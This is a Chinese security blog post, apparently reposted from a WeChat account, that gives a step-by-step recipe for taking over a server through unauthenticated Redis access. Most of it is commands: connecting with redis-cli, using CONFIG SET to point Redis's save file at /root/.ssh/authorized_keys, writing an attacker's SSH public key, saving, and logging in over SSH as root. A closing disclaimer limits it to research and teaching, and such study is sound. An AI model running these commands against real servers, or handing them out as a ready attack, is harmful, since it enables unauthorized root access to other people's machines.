Redis未授权访问导致服务器被控制

admin

138997
文章

114
评论

2021年9月4日09:38:13评论65 views字数 1369阅读4分33秒阅读模式

通过使用nmap扫描，发现某一端口对应的服务为Redis，然后我们可以尝试看看是否是未授权访问！

首先使用下列命令安装Redis tools：

root@:~# apt-get install redis-tools

然后通过下列命令看是否是未授权访问：

root@:~# redis-cli -h 10.198.131.1

10.198.131.1:6379>

然后我们可以使用免密登录的方式进行相关攻击：

生成公钥：

root@lsy:~/.ssh# ssh-keygen -t rsa

root@lsy:~/.ssh# cat id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn

root@lsy:~/.ssh#

将公钥写入远程服务器：

root@lsy:~/.ssh# redis-cli -h 10.198.131.1

10.198.131.1:6379> CONFIG SET dir /root/.ssh/

10.198.131.1:6379> CONFIG SET dbfilename authorized_keys

10.198.131.1:6379> set xxxx "nnnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsynnn"

10.198.131.1:6379> save

10.198.131.1:6379> exit

使用ssh远程登录：

root@lsy:~/.ssh# ssh 10.198.131.1

Redis未授权访问导致服务器被控制

更多飓风网络安全动态请关注：

Redis未授权访问导致服务器被控制

本文始发于微信公众号（飓风网络安全）：Redis未授权访问导致服务器被控制

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Redis未授权访问导致服务器被控制

当心你的 AI！使用 Replit AI 掩盖你的 C2 流量

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

【vulhub】 GoldenEye

MCP带来的新型安全威胁

一次有趣的前端加密对抗分享

记一次对湾湾站点的getshell到网

一个被遗忘的 API 端点让我赚了 $500

使用burpsuite爆破带有验证码和随机uuid的密码的一次经验

RAG 受到攻击：LLM 漏洞如何影响真实系统

某次211大学的渗透测试过程

发表评论

在线咨询

微信